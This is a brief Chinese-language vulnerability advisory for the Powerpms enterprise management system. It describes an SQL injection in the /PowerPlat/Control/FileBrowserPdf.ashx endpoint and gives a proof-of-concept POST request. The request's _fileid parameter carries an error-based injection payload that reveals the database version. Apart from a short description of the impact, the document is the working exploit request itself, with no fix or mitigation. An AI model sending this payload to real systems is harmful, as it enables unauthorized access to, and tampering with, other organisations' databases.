漏洞描述
普华 Powerpms 是一款企业管理系统,提供多种功能模块以支持企业的日常运营。该漏洞存在于 /PowerPlat/Control/FileBrowserPdf.ashx 接口中,攻击者可通过构造恶意 SQL 查询利用此漏洞,可能导致数据库中的敏感信息泄露、篡改甚至删除,严重威胁系统的安全性。
普华 Powerpms /PowerPlat/Control/FileBrowserPdf.ashx SQL 注入漏洞
PoC代码
POST /PowerPlat/Control/FileBrowserPdf.ashx HTTP/1.1
Host:
_fileid=1'and 1<@@VERSION--